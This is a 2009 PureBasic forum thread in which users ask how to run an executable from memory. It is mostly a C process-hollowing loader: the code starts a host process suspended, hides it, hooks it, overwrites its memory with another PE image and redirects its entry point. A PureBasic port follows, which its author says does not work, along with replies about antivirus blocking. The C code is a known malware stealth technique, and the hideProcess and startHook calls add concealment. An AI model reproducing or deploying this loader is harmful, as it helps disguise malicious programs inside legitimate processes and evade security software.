Execute EXE from memory Lib

J. Baker · Post by **J. Baker** » Sun Mar 22, 2009 12:42 am

I take it this lib is dead? Does anyone know of an update or something similar?

Mistrel · Post by **Mistrel** » Sun Mar 22, 2009 2:57 am

I don't think it's possible with DEP on modern CPUs.

Poshu · Post by **Poshu** » Sun Mar 22, 2009 4:53 am

Too bad, it could be usefull from time to time.

ALAN-MHz · Post by **ALAN-MHz** » Tue Apr 07, 2009 1:44 pm

i want to try this source that i found on net, but i make mistakes in convert to purebasic, can anyone help me ?

Code: Select all

void RunFromMemory(char* pImage,char* pPath)
{
    DWORD dwWritten = 0;
    DWORD dwHeader = 0;
    DWORD dwImageSize = 0;
    DWORD dwSectionCount = 0;
    DWORD dwSectionSize = 0;
    DWORD firstSection = 0;
    DWORD previousProtection = 0;
    DWORD jmpSize = 0;

    IMAGE_NT_HEADERS INH;
    IMAGE_DOS_HEADER IDH;
    IMAGE_SECTION_HEADER Sections[1000];

    PROCESS_INFORMATION peProcessInformation;
    STARTUPINFO peStartUpInformation;
    CONTEXT pContext;

    char* pMemory;
    char* pFile;
    memcpy(&IDH,pImage,sizeof(IDH));
    memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));
        
    dwImageSize = INH.OptionalHeader.SizeOfImage;
    pMemory = (char*)malloc(dwImageSize);
    memset(pMemory,0,dwImageSize);
    pFile = pMemory;

    dwHeader = INH.OptionalHeader.SizeOfHeaders;
    firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
    memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);

    memcpy(pFile,pImage,dwHeader);

    if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders;
    }
    else
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
        jmpSize += 1;
        jmpSize *= INH.OptionalHeader.SectionAlignment;
    }

    pFile = (char*)((DWORD)pFile + jmpSize);

    for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
    {
        jmpSize = 0;
        dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
        memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);
        
        if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
        }
        else
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);
    }


    memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
    memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
    memset(&pContext,0,sizeof(CONTEXT));

    peStartUpInformation.cb = sizeof(peStartUpInformation);
    if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation))
    {
        hideProcess(peProcessInformation.dwProcessId);
        startHook(peProcessInformation.hProcess);
        pContext.ContextFlags = CONTEXT_FULL;
        GetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
        pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
        SetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
        ResumeThread(peProcessInformation.hThread);
    }
    free(pMemory);
}

my purebasic conversion (that not work):

Code: Select all

Structure IMAGE_SECTION_HEADER
 Name.b[8]
 StructureUnion
 PhysicalAddress.l
 VirtualSize.l
 EndStructureUnion
 VirtualAddress.l
 SizeOfRawData.l
 PointerToRawData.l
 PointerToRelocations.l
 PointerToLinenumbers.l
 NumberOfRelocations.w
 NumberOfLinenumbers.w
 Characteristics.l
EndStructure 

Procedure RunFromMemory ( *pImage , *pPath )

 Protected dwWritten.l = 0
 Protected dwHeader.l = 0
 Protected dwImageSize.l = 0
 Protected dwSectionCount.l = 0
 Protected dwSectionSize.l = 0
 Protected firstSection.l = 0
 Protected previousProtection.l = 0
 Protected jmpSize.l = 0
 
 Structure IMAGE_SECTION_HEADERS
  a.IMAGE_SECTION_HEADER[1000]
 EndStructure 
 
 *INH.IMAGE_NT_HEADERS
 *IDH.IMAGE_DOS_HEADER
 peProcessInformation.PROCESS_INFORMATION
 peStartUpInformation.STARTUPINFO
 pContext.CONTEXT
 *Sections.IMAGE_SECTION_HEADERS 
 *pMemory
 *pFile
 
 CopyMemory ( @IDH , *pImage , SizeOf(*IDH) )
 CopyMemory ( @INH , ( *pImage + *IDH\e_lfanew ) , SizeOf(*INH) )
 
 dwImageSize = *INH\OptionalHeader\SizeOfImage
 *pMemory = AllocateMemory ( dwImageSize )
 *pFile = *pMemory
 
 dwHeader = *INH\OptionalHeader\SizeOfHeaders
 firstSection = *pImage + *IDH\e_lfanew + SizeOf ( IMAGE_NT_HEADERS )
 CopyMemory ( *Sections , firstSection , ( SizeOf(IMAGE_SECTION_HEADER) * *INH\FileHeader\NumberOfSections ) )
 
 CopyMemory ( *pFile , *pImage , dwHeader )
 
 If *INH\OptionalHeader\SizeOfHeaders % *INH\OptionalHeader\SectionAlignment = 0
  jmpSize = *INH\OptionalHeader\SizeOfHeaders
 Else
  jmpSize = *INH\OptionalHeader\SizeOfHeaders / *INH\OptionalHeader\SectionAlignment
  jmpSize + 1
  jmpSize * *INH\OptionalHeader\SectionAlignment
 EndIf
 
 *pFile + jmpSize
 
 For dwSectionCount = 0 To ( *INH\FileHeader\NumberOfSections - 1 )
  jmpSize = 0
  dwSectionSize = *Sections\a[dwSectionCount]\SizeOfRawData
  CopyMemory ( *pFile , ( *pImage + *Sections\a[dwSectionCount]\PointerToRawData ) , dwSectionSize )
  
  If *Sections\a[dwSectionCount]\VirtualSize % *INH\OptionalHeader\SectionAlignment = 0
   jmpSize = *Sections\a[dwSectionCount]\VirtualSize
  Else
   jmpSize = *Sections\a[dwSectionCount]\VirtualSize / *INH\OptionalHeader\SectionAlignment
   jmpSize + 1
   jmpSize * *INH\OptionalHeader\SectionAlignment
  EndIf
  
  *pFile + jmpSize
 Next

 peStartUpInformation\cb = SizeOf(peStartUpInformation)
 If CreateProcess_ ( #NUL , *pPath , @secAttrib , #NUL , #False , #CREATE_SUSPENDED , #NUL , #NUL , @peStartUpInformation , @peProcessInformation )
  pContext\ContextFlags = #CONTEXT_FULL
  getthreadcontext_ ( peProcessInformation\hThread , @pContext )
  virtualprotectex_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , dwImageSize , #PAGE_EXECUTE_READWRITE , @previousProtection )
  WriteProcessMemory_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , *pMemory , dwImageSize , @dwWritten )
  WriteProcessMemory_ ( peProcessInformation\hProcess , ( pContext\Ebx + 8) , *INH\OptionalHeader\ImageBase , 4 , @dwWritten )
  pContext\Eax = *INH\OptionalHeader\ImageBase + *INH\OptionalHeader\AddressOfEntryPoint
  SetThreadContext_( peProcessInformation\hThread , @Context )
  virtualprotectex_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , dwImageSize , previousProtection , 0 )
  ResumeThread_ ( peProcessInformation\hThread )
 EndIf 

 FreeMemory ( *pMemory )
EndProcedure

fsw · Post by **fsw** » Wed Apr 08, 2009 10:33 pm

What's wrong with that

http://www.purebasic.fr/english/viewtop ... c&start=61

It's there for several years.

Some AV software might not allow to run this piece of code though...

ts-soft · Post by **ts-soft** » Wed Apr 08, 2009 11:05 pm

fsw wrote:What's wrong with that
http://www.purebasic.fr/english/viewtop ... c&start=61

It's there for several years.

Some AV software might not allow to run this piece of code though...

It doesn't work on most PC, since several years

greetings

Thomas

ALAN-MHz · Post by **ALAN-MHz** » Thu Apr 09, 2009 8:44 am

so there isn't a real solution for xp sp3 and vista actually ?

Sandra M. · Post by **Sandra M.** » Mon Apr 20, 2009 4:36 pm

BoxedApp SDK ( http://boxedapp.com/boxedappsdk/ ) is able to launch exe from memory... But it's not free

Sandra M. · Post by **Sandra M.** » Mon Apr 20, 2009 4:37 pm

fsw wrote:Some AV software might not allow to run this piece of code though...

Yeah, they don't like SetThreadContext

SFSxOI · Post by **SFSxOI** » Fri May 08, 2009 1:01 pm

OK, I have another stupid question. Why would you want to load the .exe into memory first then launch it rather then just launching it from the beginning?

Poshu · Post by **Poshu** » Sat May 09, 2009 7:11 am

Well, it might (sometime) be useful to launch an exe wich is embedded in another one...

Sure, it might (sometime too) be harmful too...

thanos · Post by **thanos** » Sat May 09, 2009 11:26 am

Poshu wrote:Well, it might (sometime) be useful to launch an exe wich is embedded in another one...

Sure, it might (sometime too) be harmful too...

Due to installed antivirus programs this solution is not working many times.
Regards.

Thanos